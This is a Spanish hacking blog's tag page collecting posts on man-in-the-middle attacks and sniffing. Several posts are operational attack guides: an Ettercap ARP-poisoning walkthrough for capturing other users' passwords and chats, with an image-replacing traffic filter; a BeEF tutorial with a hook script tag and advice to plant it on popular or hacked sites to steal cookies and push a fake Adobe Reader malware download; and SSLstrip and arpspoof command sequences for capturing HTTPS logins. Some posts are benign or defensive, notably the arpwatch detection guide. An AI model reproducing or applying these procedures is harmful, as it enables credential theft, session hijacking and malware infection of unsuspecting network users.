Mostrando entradas con la etiqueta Man in the Middle. Mostrar todas las entradas
Mostrando entradas con la etiqueta Man in the Middle. Mostrar todas las entradas

23 feb. 2011

[Tutorial Wireshark] Análisis de tráfico by INTECO-CERT

Bueno, en http://cert.inteco.es/ han publicado un excelente tuto de Análisis de tráfico con Wireshark. Con el que que pretende servir de apoyo a administradores y técnicos de seguridad a la hora de analizar tráfico para detectar problemas o ataques de red.

22 ene. 2011

[Pirni] Sniffer y ARP-Spoofing a redes WiFi con iPhone

Pirni es un sniffer para iPhone. Es el primer analizador de tráfico de red nativo para este dispositivo. A día de hoy, Pirni no presenta todas las funcionalidades que se pueden exigir en una herramienta de análisis de tráfico, pero es la primera herramienta que permite capturar tráfico de una red en la que el dispositivo móvil se encuentre conectada.

Una de las características más interesantes es la posibilidad de construir un log con extensión .cap o .pcap. De este modo se pueden guardar las capturas de tráfico y poder estudiarlas en un Wireshark, ya sea de un PC o un Mac OS X.

29 oct. 2010

[Firesheep] Complemento de Firefox para robar contraseñas de una red Wifi abierta

Bueno... Hace poco en se publicó en Toorcon 12 el polémico complemento de Firefox, Firesheep, y digo polémico porque en muchas webs se a tratado este complemento como una herramienta magníficamente efectiva en su misión de conseguir contraseñas (especialmente de Facebook, Twitter, etc...).

La verdad es que lo que hace esta herramienta antes también se podía hacer de un "modo manual" y más complicado para aquellos que no tienen conocimiento amplio de informática (Hacking), pero con Firesheep esta tarea queda reducida a simplemente instalar dicho complemento, abrir Firefox y listo!

30 sept. 2010

Manual básico Ettercap (entorno gráfico)

Esta es una guia básica sobre la utilización de ettercap. Este programa que nos permite sniffar el tráfico de red y obtener  así las  contraseñas escritas por otros usuarios de nuestra red, además también permite leer, por ejemplo, las conversaciones del messenger u otros programas de mensajería instantánea.

1 - Primero tenemos que descargar el ettercap, la ultima versión es la 0.7.3 y
esta disponible tanto para windows como para linux:

Windows:
http://sourceforge.net/projects/ettercap/files/unofficial binaries/windows/

Linux:
http://ettercap.sourceforge.net/download.php

o (en el caso de Ubuntu)
# apt-get install ettercap-gtk

2 - Lo instalamos.

Si tienes la versión para compilar de linux:
# ./configure
# make
# make install

A partir de ahora lo interesante:

3 - Arrancamos el ettercap (en caso de linux como root, ya que sino no nos permitira seleccionar la interfaz de red a utilizar).

4 - Pestaña Sniff>Unified Sniffing

5 - Seleccionamos la interfaz que esta conectada a la red que queremos sniffar,
despues le damos a "Aceptar".

6 - Pestaña Host>Scan for hosts.

En la parte de abajo de la pantalla aparecerá algo como " X hosts added to the hosts list..."
(X sera un numero correspondiente al numero de maquinas conectadas a la red).

7 - Pestaña Host>Host list.

Ahora aparecerán las IPs de las maquinas conectadas, hay que tener en cuenta que el router también aparece (No aparece nuestro PC).

8 - Seleccionamos la IP del ordenador a atacar y pulsamos "Add to Target 1", después el router "Add to Target 2".

Ahora ya tenemos los objetivos marcados, pero antes de dar el siguiente paso tenemos que tener en cuenta que vamos a utilizar una técnica llamada Man In The Middle (MITM) y lo que haremos sera que todos los paquetes que van dirigidos al PC atacado pasen por nosotros, con lo que si nosotros nos desconectamos sin detener el ataque MITM nuestra víctima se quedara sin conexión por un tiempo, mientras se reinician las tablas arp.

9 - Pestaña Mitm>ARP Poisoning. Ahora marcamos la pestaña "Sniff remote connections" y pulsamos "Aceptar".

10 - Pestaña Start>Start sniffing.

Con esto estaremos snifando el trafico de red.

11 - Pestaña  View>Connections. Aquí podemos ver todas las conexiones y hacemos doble click sobre alguna podemos ver los datos que contiene, entre ellos conversaciones del messenger, usuarios y contraseñas, etc.

Ahora es cuestión de paciencia.

Bueno un saludo a todos y espero que os sirva.

Respeto a los filtros:

Este filtro se utiliza para cambiar las imagenes de la maquina a la que le hayamos hecho el man in the middle.

Primero tenemos que obtener el script del filtro, para esto vamos a la siguiente pagina y copiamos el script.


El script es el siguiente:
############################################################################
#                                                                          #
#  Jolly Pwned -- ig.filter -- filter source file                          #
#                                                                          #
#  By Irongeek. based on code from ALoR & NaGA                             #
#  Along with some help from Kev and jon.dmml                              #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}

Ahora modificamos la dirección de las imágenes por las que nosotros queramos, por ejemplo la de portalhacker.net, quedaría así:
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
replace("IMG SRC=", "img src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
msg("Filter Ran.\n");
}

Lo siguiente sera guardar el script con extension .filter, por ejemplo imagen.filter.

Una vez hecho esto abrimos una consola y vamos al directorio donde tenemos el imagen.filter. Una vez allí ponemos y se compilara el filtro:
etterfilter imagen.filter -o imagen.ef

Con esto nos generara el imagen.ef. Una vez creado lo copiaremos al directorio de ettercap
/usr/share/ettercap

Ahora arrancamos ettercap y realizamos el MITM. Durante el MITM vamos a la pestaña filters->load a filter.

Una vez aquí seleccionamos el archivo imagen.ef y pulsamos aceptar. Con esto ya estar el filtro aplicado y las imágenes que vea la victima serán sustituidas por las que nosotros queramos.

Autor: Aetsu

4 sept. 2010

[Wireshark] Manual


Bueno... Les traigo un Manual bastante interesante sobre Wireshark de D14M4NT3 en donde nos enseña como leer paquetes de una red, como utilizar los filtros, como leer una conversación del MSN con Wireshark, como robar Passwords que viajan en texto plano, etc…

El texto es bastante bueno como introducción a Wireshark ya que empieza de lo básico y es bastante explicativo e ilustrativo.

Manual Wireshark
Autor: D14M4NT3
Formato: PDF
Páginas: 7
Peso: 432 KB

Fuente y web del autor: http://d14m4nt3.wordpress.com/

15 jun. 2010

[Video] Sniffear teclados en una red LAN



Autor: DarkSpark
Fuente: http://foro.latinohack.com/

1 jun. 2010

[Sniffing] Paper Introductorio

Progresive Death crea un paper sobre Sniffing donde enseña como interceptar contraseñas y como configurar el Ettercap en Linux. Excelente para introducirse en el tema...

Este laboratorio teorico practico , se tratara sobre el tema del sniffing (el sniffing como tal es atrapar / analizar / visualizar al trafico que esta pasando por la red ) en este lab veremos como sniffear trafico del protocolo https (es el mismo del http solo que este es mucho mas seguro).

Sniff


Autor: Progresive Death
Fuente: http://charsecurity.blogspot.com/

6 may. 2010

[BeEF] Tutorial

Bueno, hace algún tiempo publique información sobre BeEF: [BeEFYPROXY] Interceptar el trafico WEB (MITM) ahora les traigo un tutorial que encontré y que es bastante bueno, lo recomiendo 100%:


INICIEMOS

1- Descargamos BeEF de Su pagina oficial
http://www.bindshell.net/tools/beef/

2- Desempaquetamos.....

3-En un Hosting montamos los Archivos...Cuando acabemos vamos a la GUI:

¿Una Vez Montado como saber si funciona?


Simple Nos Ponemos en la GUI :D

Y vamos al MENU VIEW Y ELEGIMOS LA 1 OPCIÓN

Este Nos Brindara una ventana de EXAMPLE O PRUEBA si vemos que Al cabo de unos Segundos Conecta...

Quiere decir que Nuestro BeEF esta Listo :D!!!


¿COMO USARLO?

Bueno vamos al menú que Nombre anteriormente VIEW/Spawn Zombie Example

Nos saldrá esta pag:

Dicho código es un ARCHIVO SCRIPT que se encuentra en los archivos que nosotros subimos con el BEEF!

<script language='Javascript' src="http://          /beef/hook/beefmagic.js.php'></script>

Ese Code Hay que Meterlo en el Body de las Páginas.. Su función sería crear un Puente...Se preguntan en que Páginas¿?... en las que Quieran...!!! EJEMPLO!... si logran meter el SCRIPT CODE en alguna pagina con usuarios EJEMPLO: facebook.com XD podrías robar SESIONES COOKIES.. Ademas Podrías meterlo en varias webs FAMOSAS CON MUCHA VISITAS y a los users los Rediriges a un EXE y así Podrías tener un Malware Infeccion

Mentiendo el Code en un INDEX de un Hacked HOST!

Este Code hará una simulación de quw la web esta Cargando... y A la vez Conecta al BEEF CLIENT.







En Nuestro Client BEEF Veríamos esto....

1 ZOMBIE A CONECTADO :D
  • Podriamos Robar Cookies
  • Sacar IPS
  • Enviar Alerts!
  • Java Applet!
  • Entre otras Funciones.....
Enviando Alerts

1- VISTA DESDE EL CLIENT MANAGER

2-VISTA DESDE LA WEB Q RECIBE

Haciendo redireccion a Archivo Exe Mediante ING SOCIAL!


1- Enviamos AlerT al usuario con algo q haga descarga

EJEMPLO: "Para Ver la Página Necesita tener Adobe reader 3"

El usuario dira Bueno lo Descargo de una....


2- Le hacemos un redirect a Un Archivo.exe Simulando ser el Adobe Reader 3

a- Vamos a NETWORK MODULES/ BROWSER REDIRECT

b- Ingresamos el enlace con el .exe MALICIOSO

c- Al abrirse el usuario creera q es el ADOBE q se le pidio anteriormente... y PFF

Fuente: http://maztor.diosdelared.com/

[+] Salu2

16 abr. 2010

[BeEFYPROXY] Interceptar el trafico WEB (MITM)



BeEFYPROXY es la unión de dos scripts que juntos permiten interceptar y re-enviar contenido modificado de sitios verdaderos aparentando ser el sitio original. Se requiere de apuntar los dominios al IP donde esta hosteado BeEFYPROXY.BeEFYPROXY esta diseñado para correr en un hosting dedicado para que la dirección IP muestre la pagina default de BeEFYPROXY.Se recibe una conexión a la dirección IP y el script toma el valor de la cabecera Host y obtiene la pagina del Host verdadero y agrega el script del cliente BeEF.

Instalación
  • Descomprime el contenido de beefproxy en /
  • Apunta cualquier dominio a la IP donde esta hosteado BeEFYPROXY y este se conecta al Host indicado, obtiene la pagina real, le agrega el script de BeEF y muestra el contenido al usuario como si fuera la pagina del dominio verdadero.
Funciones
  1. MITM con modificación de contenido
  2. Redirige el contenido actual del dominio verdadero
  3. Agrega el Framework BeEF (accesible en /beef.php) que incluye:
    • Keylog en tiempo real
    • Almacena Cookies, Keylog y HTML en /cache (ver por ftp)
    • muchas mas funciones (ver http://www.bindshell.net/tools/beef)
 Como esta hecho?

Junte BeEF (http://www.bindshell.net/tools/beef) y PHProxy (http://sourceforge.net/projects/poxy) en un solo archivo. Cambie de nombre el index.php de BeEF por beef.php y puse el index.php de PHProxy modificado.En PHProxy cambie la variable $_url_form (ln 1142) que era la barra de navegación del proxy por el url default del script de BeEF: /hook/beefmagic.js.php y le modifique su label al principio del archivo.Tambien agrege en la ln 417 una función para que cuando se recibe una petición sin variable 'q' por GET, se tome como url default el Host con el que se hace la petición.
Descargar BeEFYPROXY

Web oficial: http://www.hakim.ws/software/beefyproxy/
Más Info: http://www.bindshell.net/tools/beef

[+] ZioneR

22 mar. 2010

Tutorial SSLstrip

SSLstrip nos permite sniffar usuarios y contraseñas encriptadas en HTTPS. Esto lo hace realizando un ataque MITM entre el servidor y nuestro objetivo conectandose al servidor mediante HTTP (sin encriptar) en lugar de HTTPS (encriptado) con lo que los datos son visibles. Algunos ejemplos de páginas que utilizan esta encriptacion son Gmail o Tuenti.

Bueno primero nos descargamos un script en python desde:
http://www.thoughtcrime.org/software/sslstrip/index.html

O la descarga directa:
http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz

Una vez descargado lo extraemos y obtendremos como resultado una carpeta llamada sslstrip-0.6 (la version actual).

A continuación abrimos una shell y ponemos:
echo "1" > /proc/sys/net/ipv4/ip_forward

Ahora realizamos el ataque MITM:
# arpspoof -i {interfaz_red} -t {ip_victima} {ip_router}

A modo de ejemplo:
#  arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1

Abrimos otra shell y cambiamos la redireccion de puertos usando las iptables:
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Una vez echo lo anterior lanzamos el SSLstrip:
# python sslstrip.py -w {nombre_del_archivo_de_captura}

A modo de ejemplo:
# python sslstrip.py -w morsa

Volvemos a abrir otra shell si queremos ver en tiempo real la informacion obtenida
# tail -f {nombre_del_archivo_de_captura}

A modo de ejemplo
# tail -f morsa

Para terminar si posteriormente queremos ver los archivos del fichero de captura hacemos:
nano {nombre_del_archivo_de_captura}

O a modo de ejemplo:
# nano morsa

Autor: Aetsu
Fuente: http://foro.portalhacker.net/

10 nov. 2009

Visualizar redes en tiempo real

Utilizando la NetGrok una herramienta para visualizar redes en tiempo real. NetGrok es una potente herramienta y fácil de usar, que nos permite detectar rápidamente un problema en una red.

NetGrok tiene tres tipos de visualización de redes:
  • Graph View: Es una vista grafica en la que podemos ver todos los enlaces de la red y la topología de la red.
  • TreeMap View: Es una vista grafica en la que podemos ver la red por capas.
  • Edge Table: Una lista detallada de los host de red.
Con NetGrok también se pueden guardar capturas de tráfico en formato PCAP para su posterior análisis. Aunque donde mejor funciona esta herramienta es en un análisis en tiempo real de la red, porque nos permite filtrar los datos dinámicamente por: ancho de banda, número de conexiones y tiempo.

Más información y descarga de NetGrok:
http://www.cs.umd.edu/projects/netgrok/

Fuente:  http://vtroger.blogspot.com/

30 oct. 2009

[ArpWatch] Como Detectectar ataques Arp-Spoofing

Mucho se suele hablar de los ataques vía arp-spoofing y de la famosísima herramienta Cain & Abel. Pues bien, en este post vamos a hablar de cómo se detectan este tipo de ataques con una una sencilla herramienta: arpwatch.

Arpwatch corre bajo linux y está en los repositorios de las principales distribuciones, así que podremos instalarla con apt-get, yum, rpm, ... lo que corresponda.

Una vez instalada, deberemos editar el fichero de configuración, que está en /etc/arpwatch.conf, para que mire nuestra subred y nos envíe las alertas. Para esto, añadimos una línea dentro del fichero que ponga eth0 -a -n 192.168.1.0/24.

Obviamente, arpwatch, o cualquier otro sistema similar, no puede mirar mas que la subred o subredes a la que pertenece el PC donde lo hemos instalado, ya que los paquetes arp no saltan de VLAN en VLAN ... Esto quiere decir que necesitaremos un arpwatch por cada subred, así que deberemos ser cuidadosos y tratar de minimizar el trabajo. Típicamente, lo instalaremos en las subredes más críticas, como puedan ser administración y sistemas.

Para que nos envíe las alertas, tenemos muchas formas. Una de ellas es configurarlo para que nos mande un mail, añadiendo al fichero /etc/arpwatch.conf una línea como ésta, en lugar de la de arriba:

eth0 -a -n 192.168.1.0/24 -m usuario@dominio.es

Otra es tener un HIDS que nos remita el log a un servidor centralizado donde podemos ver las alertas de una forma más cómoda. OSSEC hará esto por nosotros automáticamente.

Sin duda, si tenemos una docena de equipos con arpwatch instalado, preferiremos la segunda a la primera.

Finalmente, no hemos hablado de cómo se inicializa la tabla arp de arpwatch ... Para esto, bastará con usar nmap para barrer la subred en la que estamos. De hecho, podemos hacer que el equipo que tiene instalado arpwatch barra su subred periódicamente, en busca de posibles intrusiones. Los primeros días, y pensando en una subred grande, nos iremos encontrando alertas de equipos nuevos encontrados, pero estas desaparecerán en un plazo corto de tiempo.

Esta es la pinta que tienen las alertas recibidas cuando aparece un nuevo equipo:


Y cuando detecta un posible ataque, recibimos un mail como éste:


En este caso, deberemos verificar que realmente se trata de un falso positivo. Es posible que hayan cambiado algún equipo estropeado, nada más ... Pero deberemos verificarlo SIEMPRE.

Por cierto, si os fijáis, veréis que el nivel de alerta era 4 en el caso de nueva MAC detectada pero es 11 para un posible arp-spoofing. Lo que hicimos aquí fue definir una nueva regla en el IDS para aumentar el nivel de criticidad, que a priori era sólo 6, y que de esa forma ossec envíe una alerta por mail. Esto para quien le interese instalar HIDS ...

En la práctica, hay que tener un poco de paciencia con los falsos positivos, pero en medio plazo funciona de maravilla.

Fuente: http://hacking-avanzado.blogspot.com/

Videotutorial ARP-spoofing (Español)


Video Tutorial (1/3): ARP
Video Tutorial (2/3): ettercap
Video Tutorial (3/3): arpwatch

Fuente: www.icaix.com/tutoriale

30 sept. 2009

Nueva versión de Cain & Abel

Caín y Abel es una herramienta de recuperación de contraseñas para los sistemas operativos de Microsoft, se característica por permitir de una forma fácil la recuperación de diversos tipos de contraseñas por diccionario,  fuerza bruta, ademas de permitir sniffiar la red en busca de estas contraseñas.

También permite decodificación de contraseñas, revelando de los cuadros de contraseña, descubrir las contraseñas almacenadas en caché y el análisis de protocolos de enrutamiento.
Los cambios en esta versión:

  • Añadido Abel64.exe y Abel64.dll para apoyar los hashes de la extracción en los sistemas operativos de  64bits.
  • Añadido soporte de NTLM hashes Dumper, MS-CACHE hashes Dumper, LSA Secrets Dumper, Wireless Password Decoder, credenciales para los sistemas operativos de  64bits.
  • Password Manager Decoder, Dialup Password Decoder.
  • Añadido Windows Live Mail (Windows 7) Password Decoder para POP3, IMAP, NNTP, SMTP y las cuentas LDAP.
  • Corregido un error de la Calculadora RSA SecurID dentro de la función de importación XML.
  • Totalmente reconstruido con Visual Studio 2008.
 Descargar Cain & Abel


Fuente: http://www.dragonjar.org

19 sept. 2009

Man in the Middle Attacks: Teoría e Introducción

Este va a ser el primero de una serie de posts, que tratarán como tema principal el ataque de tipo Man in the Middle, comúnmente abreviado como MITM, los cuales intentarán transmitir una base teórica del funcionamiento y principios del ataque, para posteriormente centrarnos en más prácticos temas prácticos, así como la defensa ante el MITM.
En cuanto a criptografía, un MITM es una técnica en el cual un atacante puede interceptar mensajes entre dos víctimas, siendo capaz de tener acceso y modificar la información transmitida entre las dos partes, todo esto sin que ninguna tenga conocimiento de éste.
Main_the_middle
Esquema de un ataque MITM, sacado de la página web de la OWASP. En este se ve cómo el atacante recibe la información que intercambian las víctimas (aquí un ordenador de escritorio y un servidor), sin que estas puedan apreciarlo.
  • Eavesdropping (literalmente, escuchar secretamente). Interceptar y acceder activamente a la información transmitida, por ejemplo, mediante un sniffer.
Eavesdropping
Diagrama de un ataque local de eavesdropping, obtenido de la web de la OWASP, en el que se ve cómo una contraseña enviada por la vítcima es interceptada por el atacante.
  • Denegaciones de servicio, es decir, interrumpir el flujo de información entre víctimas, bloqueando la comunicación.
  • Spoofing. Hacerse pasar por una de las víctimas para enviar información, modificarla…
La forma más usual de realizar este ataque, es mediante una técnica conocida como ARP Spoofing, también llamada ARP Poisoning, llevada a cabo en redes locales.

El protocolo ARP

El Adress Resolution Protocol, o protocolo de resolución de direcciones, se encarga de relacionar la dirección física o hardware de una tarjeta de interfaz de red con su dirección IP correspondiente a nivel de red, mediante peticiones ARP. Todo esto funciona mediante una serie de peticiones, que se agilizan gracias a unas tablas caché, llamadas tablas ARP, que guardan direcciones ya traducidas, que cuando pasa un determinado tiempo, se van borrando.
En el contexto del ataque, el ordenador atacante envenena las tablas ARP tanto del router como del equipo víctima, haciendo así que todo el tráfico pase por él, es decir, interceptándolo.

Fuente: http://arrivalsec.wordpress.com/